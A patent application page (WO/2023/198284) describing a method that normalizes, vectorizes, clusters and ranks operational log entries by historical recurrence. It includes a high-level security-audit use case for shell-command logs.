Login| Sign Up| Help| Contact|

Patent Searching and Data


Title:
METHOD FOR SUMMARIZING OPERATIONAL LOG DATA
Document Type and Number:
WIPO Patent Application WO/2023/198284
Kind Code:
A1
Abstract:
Provided is a method for summarizing operational log data including text data related to operations in a computer system (100). The log data is stored in a log database. The method includes obtaining text data from the log database and normalizing obtained text data by removing variable parts of the text data to generate normalized text data. The method includes generating one or more vectors of numerical values. The numerical values are related to terms present in the normalized text data. The method includes generating clusters of similar vectors by grouping the vectors based on one or more clustering criteria. The method includes extracting from the text data obtained from the log database auxiliary content related to entities in the computer system associated with operations corresponding to the obtained text data, and assigning to each cluster a part of the auxiliary content corresponding to the vectors in the cluster.

Inventors:
CAGLAYAN BORA (DE)
OLARIU CRISTIAN-ALEXANDRU (DE)
WANG MINGXUE (DE)
HU PENG (DE)
Application Number:
PCT/EP2022/059904
Publication Date:
October 19, 2023
Filing Date:
April 13, 2022
Export Citation:
Click for automatic bibliography generation   Help
Assignee:
HUAWEI TECH CO LTD (CN)
CAGLAYAN BORA (DE)
International Classes:
G06F16/35
Foreign References:
US20200184355A12020-06-11
Other References:
BHANAGE DEEPALI ARUN ET AL: "IT Infrastructure Anomaly Detection and Failure Handling: A Systematic Literature Review Focusing on Datasets, Log Preprocessing, Machine & Deep Learning Approaches and Automated Tool", IEEE ACCESS, IEEE, USA, vol. 9, 15 November 2021 (2021-11-15), pages 156392 - 156421, XP011890753, DOI: 10.1109/ACCESS.2021.3128283
Attorney, Agent or Firm:
KREUZ, Georg M. (DE)
Download PDF:
Claims:
CLAIMS

1. A method for summarizing operational log data comprising text data related to operations in a computer system (100), said log data being stored in a log database, the method comprising the steps of: obtaining text data from the log database and normalizing obtained text data by removing variable parts of the text data to generate normalized text data; generating one or more vectors of numerical values, said numerical values being related to terms present in the normalized text data; generating clusters of similar vectors by grouping the vectors based on one or more clustering criteria; extracting from the text data obtained from the log database auxiliary content related to entities in the computer system (100) associated with operations corresponding to the obtained text data, and assigning to each cluster a part of said auxiliary content corresponding to the vectors in said cluster; determining, for each cluster, one or more representative vectors amongst the vectors in said cluster; determining, for each cluster, an abnormality score related to recurrence of said cluster over a determined period of time by comparing said cluster with other clusters stored in a cluster history over said period of time; and generating, for each cluster, a log summary based on the log data corresponding to the representative vectors and the corresponding auxiliary content, each of the generated log summaries being ranked according to the corresponding abnormality score.

2. The method according to claim 1, wherein prior to generating the vectors, normalized text data are filtered according to one or more filtering rules.

3. The method according to any of claims 1 and 2, wherein generating the clusters of similar vectors comprises determining distances between each vectors, and grouping vectors based on the determined distances.

4. The method according to any of claims 1 to 3, wherein determining, for each cluster, one or more representative vectors amongst the vectors in said cluster, comprises determining the vector, amongst the vectors in said cluster, closest to the center of the cluster and selecting said determined vector as being a representative vector.

5. The method according to any of claims 1 to 3, wherein determining, for each cluster, one or more representative vectors amongst the vectors in said cluster, comprises determining an average distance between each vector in said cluster and each of the other vectors in said cluster, and selecting the vector having the smallest average distance as being a representative vector.

6. The method according to any of claims 1 to 5, wherein determining, for each cluster, an abnormality score, comprises determining the distances between the center of said cluster and the centers of each cluster stored in the cluster history, and determining the abnormality score based on said determined distances.

7. The method according to any of claims 1 to 5, wherein determining, for each cluster, an abnormality score, comprises determining the average distances between each of the vectors in said cluster and each of the vectors of each cluster stored in the cluster history, and determining the abnormality score based on said determined average distances.

8. The method according to any of claims 1 to 7, wherein each generated cluster over the determined period of time is stored in the cluster history.

9. The method according to any of claims 1 to 7, wherein determining, for each cluster, an abnormality score, comprises generating the cluster history over the predetermined period of time by executing the steps of the method according to any of claims 1 to 3 over text data history from the log database corresponding to said period of time.

10. The method according to any of claims 1 to 7, wherein generating one or more vectors of numerical values comprises generating one or more fixed length vectors of numerical values, said numerical values being related to occurrence and/or occurrence frequency of terms in the normalized text data.

11. A computer program product comprising program instructions for performing the method according to any of claims 1 to 10, when executed by one or more processors

(102A-N) in a computer system (100). 12. A computer system (100) comprising one or more processors (102A-N) and one or more memories (104A-N), said one or more memories (104A-N) storing program instructions which, when executed by said one or more processors (102A-N), causes said one or more processors (102A-N) to execute the method according to any of claims 1 to 10.

Description:
METHOD FOR SUMMARIZING OPERATIONAL LOG DATA

TECHNICAL FIELD

The disclosure relates to log summarization in operations, and more particularly, the disclosure relates to a method for summarizing operational log data related to operations in a computer system, a computer program product, and the computer system.

BACKGROUND

Log summarization is a short conclusion for operations done on a computer system. One of the key problems of Site Reliability Engineers, SREs are reaching relevant information for a problem fast, and one of the main problems is the extremely high volume of log entries that an SRE cannot parse in due time. And the SRE needs to use complex queries depending on the problem and there is no universal summarization solution for different categories of logs. The log entries format is typically following pre-defined patterns. But spotting the individual details differentiating entries of the same pattern is unfeasible to be done by the SRE. Summarizing the information to discard noise may help parse and extract actionable insights from these logs, with applications in fields such as system alarms, runtime logs, and security logs. An associate problem is in finding patterns as a function of time, such as log recurrence, and factoring this aspect in to a decision-making process. Log summarization approach may use multiple steps to normalize and vectorise the logs and afterward uses historical patterns in the log messages to identify nonrecurrent logs.

One of the known approaches discloses a LogCluster that clusters the logs and checks the recurrence of log sequence using a knowledge base and cosine similarity metrics where a score is assigned to each cluster and it is inferred based on score, and ranking of the clusters is done. For clustering log sequences, each log event is normalized and the log sequence is turned into a vector. After vectorization, the log sequences are clustered based on a similarity value between two log sequences into clusters is applied. A representative log sequence is selected from the clusters. And this approach is not explicitly disclosing transformation of clusters back as a log template and associating auxiliary entities with clusters and assigning related content on clusters. Another known approach discloses a log template extraction method that pre-processes the raw log message, and uses the word distributed representation to vectorize the log messages online. To cluster the log messages, an online hierarchical clustering algorithm is then applied, and log templates are generated. And this approach does not disclose associating auxiliary entities with clusters and assigning related content on clusters. Another known approach discloses clustering the raw log messages based on content similarity. The clustered messages are presented as a summary view. Another known approach discloses extracting information such as names entities from log messages, and future enhancement to the log signature generation using clustering and named entity recognition.

Most of the known approaches are tested on log summarization problem where most of the approaches does not include any log templates as the known approach is estimating log templates and are only applicable on logs with a limited number of log templates. Some logs also contain completely unstructured text such as system commands, where the template estimation approach is not useful. Another known approach is optimized for logs from a limited number of templates that are assumed to be constant over time. Sudden change in log format may be handled by this approach. Further, the known approach does not check historical patterns to assign an abnormality score of the logs and the output of the solutions are not ranked based on such criterion, which is the most of the disadvantages in the log summarization.

Therefore, there arises a need to address the aforementioned technical drawbacks in known techniques or technologies in log summarization.

SUMMARY

It is an object of the disclosure to provide a method for summarizing operational log data related to operations in a computer system, a computer program product, and the computer system while avoiding one or more disadvantages of prior art approaches.

This object is achieved by the features of the independent claims. Further, implementation forms are apparent from the dependent claims, the description, and the figures.

The disclosure provides a method for summarizing operational log data related to operations in a computer system, a computer program product, and the computer system.

According to a first aspect, there is provided a method for summarizing operational log data including text data related to operations in a computer system. The log data is stored in a log database. The method includes obtaining text data from the log database and normalizing obtained text data by removing variable parts of the text data to generate normalized text data. The method includes generating one or more vectors of numerical values. The numerical values are related to terms present in the normalized text data. The method includes generating clusters of similar vectors by grouping the vectors based on one or more clustering criteria. The method includes extracting from the text data obtained from the log database auxiliary content related to entities in the computer system associated with operations corresponding to the obtained text data, and assigning to each cluster a part of the auxiliary content corresponding to the vectors in the cluster. The method includes determining one or more representative vectors for each cluster amongst the vectors in the cluster. The method includes determining an abnormality score for each cluster related to recurrence of the cluster over a determined period of time by comparing the cluster with other clusters stored in a cluster history over the period of time. The method includes generating a log summary for each cluster based on the log data corresponding to the representative vectors and the corresponding auxiliary content, each of the generated log summaries being ranked according to the corresponding abnormality score.

This method provides faster summarization of key log information compared to manual human filtering on log management systems. This method provides log summary ranking based on relative importance of log summaries based on the historical recurrence patterns. This method provides reusability that enables working of any type of log through same pipeline with minimum re-configuration requirement. This method provides versatility that can be used in log filtering by providing a user opportunity for defining different tokenization and filter rules based on a category of the logs.

This method providing a log summarizer may be used to filter out noise in large log streams for operations activities dynamically. This method provides log analytics capabilities with a public cloud offering. This method may normalize, embed, and cluster operational logs and transform the cluster back as a log template and representative log. This method may associate auxiliary entities with clusters and assign related content on clusters. This method may use historical clusters to rank a new candidate cluster as recurrent or not.

This method applies to system logs and defines a processing pipeline system to integrate the summarization method and to explain log summaries. This method also assigns a recurrence metric for the log streams to estimate non-recurrent clusters. This method may be applicable to both structured and unstructured text-based logs, and may be agnostic in the applied domain.

Optionally, prior to generating the vectors, normalized text data are filtered according to one or more filtering rules.

Optionally, the method includes generating the clusters of similar vectors including determining distances between each vectors, and grouping vectors based on the determined distances.

Optionally, the method includes determining, for each cluster, one or more representative vectors amongst the vectors in the cluster, includes determining the vector, amongst the vectors in the cluster, closest to the center of the cluster and selecting the determined vector as being a representative vector.

Optionally, the method further includes determining, for each cluster, one or more representative vectors amongst the vectors in the cluster, includes determining an average distance between each vector in the cluster and each of the other vectors in the cluster, and selecting the vector having the smallest average distance as being a representative vector.

Optionally, the method includes determining, for each cluster, an abnormality score, including determining the distances between the center of the cluster and the centers of each cluster stored in the cluster history, and determining the abnormality score based on the determined distances.

Optionally, the method includes determining, for each cluster, an abnormality score, including determining the average distances between each of the vectors in the cluster and each of the vectors of each cluster stored in the cluster history, and determining the abnormality score based on the determined average distances.

Optionally, each generated cluster over the determined period of time is stored in the cluster history. Optionally, the method includes determining, for each cluster, an abnormality score, including generating the cluster history over the predetermined period of time over text data history from the log database corresponding to the period of time.

Optionally, the method includes generating one or more vectors of numerical values including generating one or more fixed length vectors of numerical values, the numerical values being related to occurrence and/or occurrence frequency of terms in the normalized text data.

According to a second aspect, there is provided a computer program product including program instructions for performing the method, when executed by one or more processors in a computer system.

The computer program product provides faster summarization of key log information compared to manual human filtering on log management systems. The computer program product provides log summary ranking based on relative importance of log summaries based on the historical recurrence patterns. The computer program product provides reusability that enables working of any type of log through same pipeline with minimum re-configuration requirement. The computer program product provides versatility that can be used in log filtering by providing a user opportunity for defining different tokenization and filter rules based on a category of the logs.

The computer program product providing a log summarizer may be used to filter out noise in large log streams for operations activities dynamically. The computer program product provides log analytics capabilities with a public cloud offering. The computer program product may normalize, embed, and cluster operational logs and transform the cluster back as a log template and representative log. The computer program product may associate auxiliary entities with clusters and assign related content on clusters. The computer program product may use historical clusters to rank a new candidate cluster as recurrent or not.

According to a third aspect, there is provided a computer system including one or more processors and one or more memories. The one or more memories storing program instructions which, when executed by the one or more processors, cause the one or more processors to execute the method. The computer system provides faster summarization of key log information compared to manual human filtering on log management systems. The computer system provides log summary ranking based on relative importance of log summaries based on the historical recurrence patterns. The computer system provides reusability that enables working of any type of log through same pipeline with minimum re-configuration requirement. The computer system provides versatility that can be used in log filtering by providing a user opportunity for defining different tokenization and filter rules based on a category of the logs.

The computer system provides a log summarizer may be used to filter out noise in large log streams for operations activities dynamically. The computer system provides log analytics capabilities with a public cloud offering. The computer system may normalize, embed, and cluster operational logs and transform the cluster back as a log template and representative log. The computer system may associate auxiliary entities with clusters and assign related content to clusters. The computer system may use historical clusters to rank a new candidate cluster as recurrent or not.

The computer system applies to system logs and defines a processing pipeline system to integrate the summarization method and to explain log summaries. The computer system also assigns a recurrence metric for the log streams to estimate non-recurrent clusters. The computer system may be applicable to both structured and unstructured text-based logs, and may be agnostic in the applied domain.

Therefore, in contradistinction to the prior art, according to the method for summarizing operational log data related to operations in a computer system, a computer program product, and the computer system, are improved by providing faster summarization of key log information with log summary ranking, reusability, and versatility.

These and other aspects of the disclosure will be apparent from and the implementation(s) described below.

BRIEF DESCRIPTION OF DRAWINGS

Implementations of the disclosure will now be described, by way of example only, with reference to the accompanying drawings, in which:

FIG. 1 is a block diagram of a computer system in accordance with an implementation of the disclosure;

FIG. 2A is an exemplary flow diagram that illustrates components for a log summarization process in accordance with an implementation of the disclosure;

FIG. 2B is an exemplary graphical representation of output for operational log summaries for the log summarization process in accordance with an implementation of the disclosure;

FIG. 2C is an exemplary block diagram of log summarization process for security audit use case in accordance with an implementation of the disclosure;

FIG. 3 is a flow diagram that illustrates a method for summarizing operational log data including text data related to operations in a computer system in accordance with an implementation of the disclosure; and

FIG. 4 is an illustration of a computing arrangement (e.g. a computer system) that is used in accordance with implementations of the disclosure.

DETAILED DESCRIPTION OF THE DRAWINGS

Implementations of the disclosure provide a method for summarizing operational log data related to operations in a computer system, a computer program product, and the computer system.

To make solutions of the disclosure more comprehensible for a person skilled in the art, the following implementations of the disclosure are described with reference to the accompanying drawings.

Terms such as "a first", "a second", "a third", and "a fourth" (if any) in the summary, claims, and foregoing accompanying drawings of the disclosure are used to distinguish between similar objects and are not necessarily used to describe a specific sequence or order. It should be understood that the terms so used are interchangeable under appropriate circumstances, so that the implementations of the disclosure described herein are, for example, capable of being implemented in sequences other than the sequences illustrated or described herein. Furthermore, the terms "include" and "have" and any variations thereof, are intended to cover a non-exclusive inclusion. For example, a process, a method, a system, a product, or a device that includes a series of steps or units, is not necessarily limited to expressly listed steps or units but may include other steps or units that are not expressly listed or that are inherent to such process, method, product, or device.

FIG. 1 is a block diagram of a computer system 100 in accordance with an implementation of the disclosure. The computer system 100 includes one or more processors 102A-N and one or more memories 104A-N. The one or more memories 104A-N storing program instructions which, when executed by the one or more processors 102A-N, causes the one or more processors 102A-N to execute a method for summarizing operational log data.

The computer system 100 provides faster summarization of key log information compared to manual human filtering on log management systems. The computer system 100 provides log summary ranking based on relative importance of log summaries based on the historical recurrence patterns. The computer system 100 provides reusability that enables working of any type of log through same pipeline with minimum re-configuration requirement. The computer system 100 provides versatility that can be used in log filtering by providing a user opportunity for defining different tokenization and filter rules based on a category of the logs.

The computer system 100 provides a log summarizer may be used to filter out noise in large log streams for operations activities dynamically. The computer system 100 provides log analytics capabilities with a public cloud offering. The computer system 100 normalize, embed, and cluster operational logs and transform the cluster back as a log template and representative log. The computer system 100 may associate auxiliary entities with clusters and assign related content on clusters. The computer system 100 may use historical clusters to rank a new candidate cluster as recurrent or not.

The computer system 100 applies to system logs and defines a processing pipeline system to integrate the summarization method and to explain log summaries. The computer system 100 also assigns a recurrence metric for the log streams to estimate non-recurrent clusters. The computer system 100 may be applicable to both structured and unstructured text-based logs, and may be agnostic in the applied domain.

The log data may be stored in a log database. The one or more processors 102A-N are configured to obtain text data from the log database and normalize obtained text data by removing variable parts of the text data to generate normalized text data. The one or more processors 102A-N are configured to generate one or more vectors of numerical values. The numerical values may be related to terms present in the normalized text data. The one or more processors 102A-N are configured to generate clusters of similar vectors by grouping the vectors based on one or more clustering criteria. The one or more processors 102A-N are configured to extract from the text data obtained from the log database auxiliary content related to entities in the computer system 100 associated with operations corresponding to the obtained text data, and assign to each cluster a part of the auxiliary content corresponding to the vectors in the cluster. The one or more processors 102A-N are configured to determine, for each cluster, one or more representative vectors amongst the vectors in the cluster. The one or more processors 102A-N are configured to determine, for each cluster, an abnormality score related to recurrence of the cluster over a determined period of time by comparing the cluster with other clusters stored in a cluster history over the period of time. The one or more processors 102A-N are configured to generate, for each cluster, a log summary based on the log data corresponding to the representative vectors and the corresponding auxiliary content, each of the generated log summaries being ranked according to the corresponding abnormality score.

FIG. 2A is an exemplary flow diagram that illustrates components for a log summarization process in accordance with an implementation of the disclosure. The components include a log management 202, an event trigger 204, a log query 206, a log summarization 208, historical log clusters 210, log recurrence analysis 212, and a log summary 214. The log management 202 is a production solution used to store and monitor operations logs. Optionally, the log management 202 provides a technology stack that is used to store, query, and report log data. The production solution may be accessed programmatically for log summarization. The log summarization process may be tested on a standard Elasticsearch, Logstash, Kibana, ELK stack log management software utilized by a consumer business group. Optionally, the ELK stack log management software is an open source toolset with high popularity. The log management 202 may be plugged into other open-source or commercial solutions in a market offering similar functionality.

The event trigger 204 is a change in service operations that is affecting certain subset. Optionally, the certain subset includes alarms. The log summarization process enables the event trigger 204 to provide two modes of operation including a reactive mode or an active mode. The reactive mode of operation is triggered reactively after observation of an event such as an alarm. Optionally, the reactive mode is an event-triggered mode. The active mode of operation continuously monitors a sub-portion of the logs and generates log summaries actively. The log query 206 is a query generated on the log summarization process based on the trigger event-based summarization or a time duration for active summarization. The log query 206 may support random sampling for log streams with high volume. In an instance, 10% of the logs may be monitored for high- volume streams.

The log summarization 208 is log summarization step clusters the logs and returns cluster explanation. The log summarization 208 on the log summarization process is a pipeline that includes text normalization, rule-based filtering, vectorization, clustering, and explanation. The historical log clusters 210 includes past log clusters for past time chunks. The past log clusters may be stored in a database for long durations as the size of the log clusters is small. Optionally, the past log clusters are summaries of the logs. The size of the log clusters may be less than 2 kilobytes per summary. Optionally, the summaries are stored in a Postgresgl RDBMS. The past summaries may be used to rank new log summaries in terms of their abnormality. The log recurrence analysis 212 is configured to check a historical cluster similarity to estimate a recurrence score for the logs. The log summaries may be ranked based on their edit distance with the historical clusters. The log summary 214 provides a summary of the operational logs with optional auxiliary entity mappings are returned by a query and their recurrence rankings are returned. The log summarization pipeline may include one or more steps to transform a batch of raw log data into a log summary. The following table provides sample pipeline details for use cases.

The text normalization step may be different based on the natural language content in the logs. Optionally, variable parts of the text are removed in the text normalization step. If the log contains mostly natural language data, numbers or set parameters may be removed. If the log contains computer language fragments, a lexer or scanner may be used to remove the variable parts including variable values. The log summarization process includes rule-based filtering that filters logs based on user-defined regular expressions. The logs that are related to a particular IP or domain may be filtered in the rule-based filtering. Optionally, the processed text can be embedded as a dense vector using an available text vectorization algorithm after the logs are cleaned. Optionally, vectorization, feature reduction, and clustering segments large unstructured log stream. In an instance, GLOVE is used but other context dependent vectorization algorithms can be trialled in the log summarization process. The logs in vector space may be clustered using a standard clustering algorithm. In an instance, HBDScan and affinity propagation algorithms are used for clustering. For each cluster, one or more auxiliary columns may be appended to the cluster information. Optionally, the one or more auxiliary columns may include entities that are associated with the log message under different column names. The entities may include server host names and user names. A representative log is defined by decoding the cluster content and getting the log nearest the cluster centroid in the explanation phase. The content of the cluster may contain representative normalized log and associated entities. Optionally, the explainable results include any of cluster summary, a representative member of the cluster, cluster size, or cluster pattern count.

The HDBScan algorithm may transform a space according to density/sparsity,that identifies dense zones in a computationally efficient manner. The HDBScan algorithm may build a minimum spanning tree of a distance-weighted graph. Optionally, the HDBScan constructs a cluster hierarchy of connected components, condense the cluster hierarchy based on minimum cluster size, and extract stable clusters from a condensed tree. Optionally, the log summarization process includes a core distance which is a distance to k nearest neighbour, including a space transformation which is a distance between points is transformed with a formulae: dmreach-k(a,b) = max{corek(a), corek(b), d(a,b)}. If the zone is sparse, the distance between the points may be increased.

Optionally, each cluster includes N log items inside with vector representations. The log summarization process may transform vector back by checking nearest logs in terms of distance. The log summarization process may select representative logs in the cluster for decoding. The representative logs include the selection process for representative clusters that are based on the clustering algorithm used, select a node that is nearest to cluster centre if the algorithm generates convex clusters, and select a log instance with smallest average distance across the spanning tree as an exemplar instance for a cluster. For HBDScan, the generated clusters may not have centres as the clusters are not convex.

Optionally, the log recurrence analysis rank summaries based on their abnormality ranking with an algorithm. Users may define a time interval with 24 hours or 1 hour and number of past intervals to check. They may obtain cached summaries if exists or nocache generates the summary for the historical periods. For example, if a goal is summarizing a portion of logs for the last 10 minutes and time interval is 24 hours, and past interval count is 3, the algorithm compares the summary with previous summaries 1, 2, and 3 days before same time. The summaries may be ranked based on maximum edit distance after getting the historical summaries. A new summary with the maximum edit distance may be ranked the most abnormal log summary, indicating a new pattern. Optionally, the time interval and interval count can be calibrated based on a problem domain.

The output of the log recurrence analysis is to rank log templates based on their abnormality, that includes user specifies t time ranges, log summaries the logs for the specified time ranges, maximum normalized edit distance between clusters is used to specify the log abnormality ranking, log abnormality ranking is used to rank the summarized logs for the end user.

FIG. 2B is an exemplary graphical representation of output for operational log summaries for the log summarization process in accordance with an implementation of the disclosure. The exemplary graphical representation illustrates a user interface of run log summarization for a representative normalized log of seven patterns. The log summarization process may be integrated with machine learning models that is scalable for all shell commands run across all virtual machines with a maximum end-to-end delay of 10 minutes.

FIG. 2C is an exemplary block diagram of log summarization process for security audit use cases in accordance with an implementation of the disclosure. The exemplary block diagram includes a security log stream 216, a semantic log parser 218, a security log filter 220, a log abnormality estimator 222, a supervised threat classifier 224, a security log summarizer 226, a log embedder 228, a daily log summaries repository 230, a rolling warning filter 232, daily attack warnings 234, and one or more data sources 236A-N. The security log stream 216 is a primary data source that includes shell commands to run on hosts. The semantic log parser 218 receives the shell commands from the security log stream 216 and is configured to tokenize the bash commands in the shell commands, parse the command to identify subcommands that are linked together and check the CMDB and command semantics db sources to match the type of a token with a known entity. The semantic log parser 218 outputting a semantic parser output may be used in template formation for log summarizer.

The security log filter 220 is configured to filter logs with access to external IPs by using semantically parsed logs as the input from the semantic log parser 218. The security log filter 220 may filter audio log and Unix user modification operations, ddl and serious dml command on a script, white and black lists that are customized by the user. The security log summarizer 226 is configured to cluster the logs per day. Optionally, the security log summarized 226 uses an embedder, cluster, and explain functionality for clustering the logs. The log embedder 228 is configured to embed logs on vector space with the clusters on the logs. The daily log summaries repository 230 is configured to provide cluster details with host details of the log summaries.

The log abnormality estimator 222 receives the daily log summaries repository, and the filtered logs. The log abnormality estimator 222 is configured to check similarity of the filtered logs and seasonal clusters for previous days and check if the log comes from a different type of host. The log abnormality estimator 222 may also check if a particular log is an abnormally observer in a session on a host. The supervised threat classifier 224 is configured to predict a verified attack in the filtered log data. The rolling warning filter 232 is configured to provide a rolling warning for a current day which may be updated for every predetermined time. Optionally, the predetermined time is in a range of 5 minutes to 15 minutes. The rolling warning may include a judgement that includes command abnormal, associated black list pattern, associated verified attack, and associated context. The daily attack warnings 234 is configured to provide attack warnings. The attack warning may include a judgement that includes command abnormal, associated black list pattern, associated verified attack, and associated context.

The one or more data sources 236A-N include an arango database, a command semantics database, a blacklists database, and a verified attack database. The arango database may be used to get context, related to hosts and the like. The semantic log parser 218 may get context from the arango database, and semantic commands from the command semantics database. The security log filter 220 may store the blacklists in the blacklists database. The supervised threat classifier 224 may store the verified attacks in the verified attack database.

FIGS. 3A-3B are flow diagrams that illustrate a method for summarizing operational log data including text data related to operations in a computer system in accordance with an implementation of the disclosure. The log data is stored in a log database. At a step 302, text data is obtained from the log database and obtained text data is normalized by removing variable parts of the text data to generate normalized text data. At a step 304, one or more vectors of numerical values are generated. The numerical values are related to terms present in the normalized text data. At a step 306, clusters of similar vectors are generated by grouping the vectors based on one or more clustering criteria. At a step 308, the text data obtained from the log database auxiliary content related to entities in the computer system associated with operations are extracted corresponding to the obtained text data, and each cluster is assigned to a part of the auxiliary content corresponding to the vectors in the cluster. At a step 310, one or more representative vectors are determined for each cluster amongst the vectors in the cluster. At a step 312, an abnormality score is determined for each cluster related to recurrence of the cluster over a determined period of time by comparing the cluster with other clusters stored in a cluster history over the period of time. At a step 314, a log summary is generated for each cluster based on the log data corresponding to the representative vectors and the corresponding auxiliary content, each of the generated log summaries being ranked according to the corresponding abnormality score.

This method provides faster summarization of key log information compared to manual human filtering on log management systems. This method provides log summary ranking based on relative importance of log summaries based on the historical recurrence patterns. This method provides reusability that enables working of any type of log through same pipeline with minimum re-configuration requirement. This method provides versatility that can be used in log filtering by providing a user opportunity for defining different tokenization and filter rules based on a category of the logs. This method providing a log summarizer may be used to filter out noise in large log streams for operations activities dynamically. This method provides log analytics capabilities with a public cloud offering. This method may normalize, embed, and cluster operational logs and transform the cluster back as a log template and representative log. This method may associate auxiliary entities with clusters and assign related content on clusters. This method may use historical clusters to rank a new candidate cluster as recurrent or not.

This method applies to system logs and defines a processing pipeline system to integrate the summarization method and to explain log summaries. This method also assigns a recurrence metric for the log streams to estimate non-recurrent clusters. This method may be applicable to both structured and unstructured text-based logs, and may be agnostic in the applied domain.

Optionally, prior to generating the vectors, normalized text data are filtered according to one or more filtering rules.

Optionally, the method includes generating the clusters of similar vectors including determining distances between each vectors, and grouping vectors based on the determined distances.

Optionally, the method includes determining, for each cluster, one or more representative vectors amongst the vectors in the cluster, includes determining the vector, amongst the vectors in the cluster, closest to the center of the cluster and selecting the determined vector as being a representative vector.

Optionally, the method further includes determining, for each cluster, one or more representative vectors amongst the vectors in the cluster, includes determining an average distance between each vector in the cluster and each of the other vectors in the cluster, and selecting the vector having the smallest average distance as being a representative vector.

Optionally, the method includes determining, for each cluster, an abnormality score, including determining the distances between the center of the cluster and the centers of each cluster stored in the cluster history, and determining the abnormality score based on the determined distances. Optionally, the method includes determining, for each cluster, an abnormality score, including determining the average distances between each of the vectors in the cluster and each of the vectors of each cluster stored in the cluster history, and determining the abnormality score based on the determined average distances.

Optionally, each generated cluster over the determined period of time is stored in the cluster history.

Optionally, the method includes determining, for each cluster, an abnormality score, including generating the cluster history over the predetermined period of time over text data history from the log database corresponding to the period of time.

Optionally, the method includes generating one or more vectors of numerical values including generating one or more fixed length vectors of numerical values, the numerical values being related to occurrence and/or occurrence frequency of terms in the normalized text data.

In an aspect, there is provided a computer program product including program instructions for performing the method, when executed by one or more processors in a computer system.

FIG. 4 is an illustration of an exemplary computing arrangement 400 (e.g. a storage device) in which the various architectures and functionalities of the various previous implementations may be implemented. As shown, the computing arrangement 700 includes at least one processor 404 that is connected to a bus 402, wherein the computing arrangement 400 may be implemented using any suitable protocol, such as PCI (Peripheral Component Interconnect), PCI-Express, AGP (Accelerated Graphics Port), HyperTransport, or any other bus or point-to-point communication protocol (s). The computing arrangement 400 also includes a memory 406.

Control logic (software) and data are stored in the memory 406 which may take the form of random-access memory (RAM). In the present description, a single semiconductor platform may refer to a sole unitary semiconductor-based integrated circuit or chip. It should be noted that the term single semiconductor platform may also refer to multi-chip modules with increased connectivity which simulate on-chip modules with increased connectivity which simulate on-chip operation, and make substantial improvements over utilizing a conventional central processing unit (CPU) and bus implementation. Of course, the various modules may also be situated separately or in various combinations of semiconductor platforms per the desires of the user.

The computing arrangement 400 may also include a secondary storage 410. The secondary storage 410 includes, for example, a hard disk drive and a removable storage drive, representing a floppy disk drive, a magnetic tape drive, a compact disk drive, digital versatile disk (DVD) drive, recording device, universal serial bus (USB) flash memory. The removable storage drive at least one of reads from and writes to a removable storage unit in a well-known manner.

Computer programs, or computer control logic algorithms, may be stored in at least one of the memory 406 and the secondary storage 410. Such computer programs, when executed, enable the computing arrangement 400 to perform various functions as described in the foregoing. The memory 406, the secondary storage 410, and any other storage are possible examples of computer-readable media.

In an implementation, the architectures and functionalities depicted in the various previous figures may be implemented in the context of the processor 404, a graphics processor coupled to a communication interface 412, an integrated circuit (not shown) that is capable of at least a portion of the capabilities of both the processor 404 and a graphics processor, a chipset (i.e., a group of integrated circuits designed to work and sold as a unit for performing related functions, etc.).

Furthermore, the architectures and functionalities depicted in the various previous figures may be implemented in the context of a general computer system, a circuit board system, a game console system dedicated for entertainment purposes, an application- specific system. For example, the computing arrangement 400 may take the form of a desktop computer, a laptop computer, a server, a workstation, a game console, an embedded system.

Furthermore, the computing arrangement 400 may take the form of various other devices including, but not limited to a personal digital assistant (PDA) device, a mobile phone device, a smart phone, a television, etc. Additionally, although not shown, the computing arrangement 400 may be coupled to a network (e.g., a telecommunications network, a local area network (LAN), a wireless network, a wide area network (WAN) such as the Internet, a peer-to-peer network, a cable network, or the like) for communication purposes through an I/O interface 408.

It should be understood that the arrangement of components illustrated in the figures described are exemplary and that other arrangement may be possible. It should also be understood that the various system components (and means) defined by the claims, described below, and illustrated in the various block diagrams represent components in some systems configured according to the subject matter disclosed herein. For example, one or more of these system components (and means) may be realized, in whole or in part, by at least some of the components illustrated in the arrangements illustrated in the described figures.

In addition, while at least one of these components are implemented at least partially as an electronic hardware component, and therefore constitutes a machine, the other components may be implemented in software that when included in an execution environment constitutes a machine, hardware, or a combination of software and hardware. Although the disclosure and its advantages have been described in detail, it should be understood that various changes, substitutions, and alterations can be made herein without departing from the spirit and scope of the disclosure as defined by the appended claims.